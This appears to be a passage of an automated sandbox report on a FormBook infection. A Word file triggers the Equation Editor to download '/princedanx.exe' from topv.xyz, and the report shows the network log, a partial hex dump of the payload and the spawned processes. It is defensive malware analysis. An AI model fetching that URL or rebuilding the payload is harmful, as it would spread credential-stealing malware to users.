                  Jul 22, 2021 14:14:41.497148037 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.497172117 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.497173071 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.497196913 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.497220039 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.497240067 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.497845888 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.549536943 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.549565077 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.549587011 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.549607038 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.549628019 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.549628973 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.549647093 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.549659014 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.549673080 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.549676895 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.549694061 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.549695969 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.549711943 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.549731016 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.549815893 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.549837112 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.549861908 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.549863100 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.549881935 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.549897909 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.549901009 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.549937963 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.549984932 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550007105 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550028086 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550026894 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550046921 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550048113 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550064087 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550081968 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550106049 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550128937 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550149918 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550151110 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550165892 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550169945 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550184965 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550203085 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550235987 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550275087 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550322056 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550344944 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550362110 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550369024 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550379038 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550403118 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550415993 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550436974 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550448895 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550474882 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550494909 CEST8049165185.239.243.112192.168.2.22

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 22, 2021 14:14:41.152980089 CEST5219753192.168.2.228.8.8.8
                  Jul 22, 2021 14:14:41.210225105 CEST53521978.8.8.8192.168.2.22
                  Jul 22, 2021 14:14:41.210582018 CEST5219753192.168.2.228.8.8.8
                  Jul 22, 2021 14:14:41.267796040 CEST53521978.8.8.8192.168.2.22

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Jul 22, 2021 14:14:41.152980089 CEST192.168.2.228.8.8.80x62a5Standard query (0)topv.xyzA (IP address)IN (0x0001)
                  Jul 22, 2021 14:14:41.210582018 CEST192.168.2.228.8.8.80x62a5Standard query (0)topv.xyzA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Jul 22, 2021 14:14:41.210225105 CEST8.8.8.8192.168.2.220x62a5No error (0)topv.xyz185.239.243.112A (IP address)IN (0x0001)
                  Jul 22, 2021 14:14:41.267796040 CEST8.8.8.8192.168.2.220x62a5No error (0)topv.xyz185.239.243.112A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • topv.xyz

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.2249165185.239.243.11280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  TimestampkBytes transferredDirectionData
                  Jul 22, 2021 14:14:41.335500002 CEST0OUTGET /princedanx.exe HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: topv.xyz
                  Connection: Keep-Alive
                  Jul 22, 2021 14:14:41.441436052 CEST2INHTTP/1.1 200 OK
                  Server: nginx
                  Date: Thu, 22 Jul 2021 12:14:41 GMT
                  Content-Type: application/x-msdownload
                  Content-Length: 648912
                  Last-Modified: Wed, 21 Jul 2021 23:31:35 GMT
                  Connection: keep-alive
                  ETag: "60f8ae57-9e6d0"
                  Accept-Ranges: bytes
                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0f 9e f8 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 9c 08 00 00 2c 01 00 00 00 00 00 96 bb 08 00 00 20 00 00 00 c0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c bb 08 00 57 00 00 00 00 c0 08 00 18 28 01 00 00 00 00 00 00 00 00 00 00 ca 09 00 d0 1c 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c 9b 08 00 00 20 00 00 00 9c 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 28 01 00 00 c0 08 00 00 2a 01 00 00 9e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 c8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 bb 08 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 9f 08 00 a0 1b 00 00 03 00 00 00 20 00 00 06 98 31 00 00 04 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 18 18 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 14 00 00 0a 74 02 00 00 02 1a 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 09 00 25 00 00 00 00 00 00 00 02 28 15 00 00 0a 02 03 16 2c 0b 26 26 02 04 15 2d 0b 26 26 2b 0e 7d 02 00 00 04 2b f0 7d 03 00 00 04 2b 00 2a 00 00 00 03 30 04 00 5c 00 00 00 00 00 00 00 02 28 15 00 00 0a 20 f0 55 00 00 1c 2d 1b 26 02 73 16 00 00 0a 1d 2d 18 26 26 28 17 00 00 0a 7e 06 00 00 04 25 2d 2f 2b 0e 28 18 00 00 0a 2b df 7d 04 00 00 04 2b e3 26 7e 05 00 00 04 fe 06 0d 00 00 06 73 19 00 00 0a 25 1c 2d 03 26 2b 07 80 06 00 00 04 2b 00 6f 1a 00 00 0a 2a 13 30 03 00 29 00 00 00 01 00 00 11 03 04 73 04 00 00 06 16 2c 0c 26 02 03 28 0a 00 00 06 2d 13 2b 03 0a 2b f2 02 7b 04 00 00 04 06 6f 1b 00 00 0a 17 2a 16 2a 00 00 00 13 30 03 00 24 00 00 00 01 00 00 11 02 03 28 0a 00 00 06 17 2d 06 26 06 2c 14 2b 03 0a 2b f8 02 7b 04 00 00 04 06 6f 1c 00 00 0a 26 17 2a 16 2a 03 30 0a 00 1f 00 00 00 00 00 00 00 02 19 19 2d 13 26 7b 04 00 00 04 03 18 15 2d 0b 26 6f 1d 00 00 0a 2b 06 26 2b eb 26 2b f3 2a 00 03 30 0a 00 19 00 00 00 00 00 00 00 02 19 15 2d 10 26 7b 04 00 00 04 6f 1e 00 00 0a 16 fe 01 2b 03 26 2b ee 2a 00 00 00 13 30 04 00 34 00 00 00 02 00 00 11 73 0e 00 00 06 16 2c 21 26 06 03 19 2d 1e 26 26 02 7b 04 00 00 04 06 fe 06 0f 00 00 06 73 1f 00 00 0a 6f 20 00 00 0a 2b 0a 0a 2b dd 7d 07 00 00 04 2b dd 2a 03 30 09
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`, @ @<W( H.text `.rsrc(*@@.reloc@BxH 1n0-&(+&+*0s(t-&++*~*0%(,&&-&&+}+}+*0\( U-&s-&&(~%-/+(+}+&~s%-&++o*0)s,&(-++{o**0$(-&,++{o&**0-&{-&o+&+&+*0-&{o+&+*04s,!&-&&{so ++}+*0


                  Code Manipulations

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:14:14:34
                  Start date:22/07/2021
                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  Wow64 process (32bit):false
                  Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                  Imagebase:0x13f3c0000
                  File size:1424032 bytes
                  MD5 hash:95C38D04597050285A18F66039EDB456
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:14:14:35
                  Start date:22/07/2021
                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit):true
                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Imagebase:0x400000
                  File size:543304 bytes
                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:14:14:36
                  Start date:22/07/2021
                  Path:C:\Users\user\AppData\Roaming\princedan859323.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\princedan859323.exe
                  Imagebase:0x8f0000
                  File size:648912 bytes
                  MD5 hash:0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Antivirus matches:
                  • Detection: 24%, ReversingLabs
                  Reputation:low

                  General

                  Start time:14:15:18
                  Start date:22/07/2021
                  Path:C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase:0x3e0000
                  File size:648912 bytes
                  MD5 hash:0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 24%, ReversingLabs
                  Reputation:low

                  General

                  Start time:14:15:18
                  Start date:22/07/2021
                  Path:C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase:0x3e0000
                  File size:648912 bytes
                  MD5 hash:0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:14:15:19
                  Start date:22/07/2021
                  Path:C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase:0x3e0000
                  File size:648912 bytes
                  MD5 hash:0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:14:15:19
                  Start date:22/07/2021
                  Path:C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase:0x3e0000
                  File size:648912 bytes
                  MD5 hash:0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:14:15:20
                  Start date:22/07/2021
                  Path:C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase:0x3e0000
                  File size:648912 bytes
                  MD5 hash:0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:14:15:20
                  Start date:22/07/2021
                  Path:C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase:0x3e0000
                  File size:648912 bytes
                  MD5 hash:0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:14:15:21
                  Start date:22/07/2021
                  Path:C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase:0x3e0000
                  File size:648912 bytes
                  MD5 hash:0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:14:15:21
                  Start date:22/07/2021
                  Path:C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase:0x3e0000
                  File size:648912 bytes
                  MD5 hash:0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:14:15:22
                  Start date:22/07/2021
                  Path:C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase:0x3e0000
                  File size:648912 bytes
                  MD5 hash:0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:14:15:22
                  Start date:22/07/2021
                  Path:C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase:0x3e0000
                  File size:648912 bytes
                  MD5 hash:0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Disassembly

                  Code Analysis

                  Reset < >